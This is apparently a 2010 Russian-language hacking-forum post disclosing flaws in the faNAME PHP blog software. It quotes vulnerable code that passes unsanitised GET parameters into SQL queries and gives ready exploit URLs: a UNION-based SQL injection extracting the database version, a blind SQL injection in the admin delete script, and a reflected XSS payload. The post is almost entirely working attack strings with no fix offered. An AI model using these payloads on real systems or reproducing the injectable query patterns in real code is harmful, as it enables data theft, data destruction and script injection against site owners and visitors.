
12.03.2010, 12:01
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
faNAME
product : en.faname
SQL injection
1. mq = off
page.php - уязвимость в коде файла /class/page.php к которому обращается файл
Code :
PHP код:
$id = $_GET['id'];
$kind = "id";
$result = mysql_query("SELECT * FROM blog WHERE $kind LIKE '$id' order by id DESC LIMIT 1");
while($r=mysql_fetch_array($result))
result :
Код:
http://localhost/en.faname/page.php?id=2'+and+0+union+all+select+1,version(),3,4--+
Blind sql
2. admin panel
/admin/del.page.php
PHP код:
if($_GET["cmd"]=="delete")
{
$id = $_GET['id'];
$sql = "DELETE FROM blog WHERE id=$id";
$result = mysql_query($sql);
result :
Код:
http://localhost/en.faname/admin/del.page.php?cmd=delete&id={blind sql}
Passive XSS
mq = off
Код:
http://localhost/en.faname/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
|
|
|